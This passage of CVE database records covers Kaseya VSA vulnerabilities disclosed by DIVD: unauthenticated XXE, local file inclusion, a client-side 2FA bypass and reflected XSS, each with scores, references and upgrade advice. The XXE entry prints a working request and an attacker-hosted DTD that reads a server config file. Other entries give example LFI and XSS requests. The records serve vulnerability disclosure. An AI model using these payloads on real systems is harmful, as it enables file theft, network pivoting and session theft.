          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. 
Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:20",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30201"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to version 9.5.6 or higher"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30201",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. 
Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30201",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30201"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to version 9.5.6 or higher"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30201",
    "datePublished": "2021-07-09T13:25:37",
    "dateReserved": "2021-04-07T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30121 (GCVE-0-2021-30121)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:24 – Updated: 2024-08-03 22:24
Summary
Semi-authenticated local file inclusion. The contents of arbitrary files can be returned by the webserver. Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118.
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.547Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30121"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:19",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30121"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30121",
          "STATE": "PUBLIC",
          "TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30121",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30121"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30121",
    "datePublished": "2021-07-09T13:24:28",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.547Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30120 (GCVE-0-2021-30120)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:22 – Updated: 2024-08-03 22:24
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and uses an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in.
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.669Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csrit.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csrit.divd.nl/CVE-2021-30120"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csrit.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csrit.divd.nl/CVE-2021-30120"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "2FA bypass in Kaseya VSA \u003c= v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30120",
          "STATE": "PUBLIC",
          "TITLE": "2FA bypass in Kaseya VSA \u003c= v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csrit.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csrit.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csrit.divd.nl/CVE-2021-30120",
              "refsource": "CONFIRM",
              "url": "https://csrit.divd.nl/CVE-2021-30120"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30120",
    "datePublished": "2021-07-09T13:22:17",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.669Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30119 (GCVE-0-2021-30119)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:20 – Updated: 2024-08-03 22:24
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk and Hidde Smit of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.199Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30119"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:17",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30119"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30119",
          "STATE": "PUBLIC",
          "TITLE": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
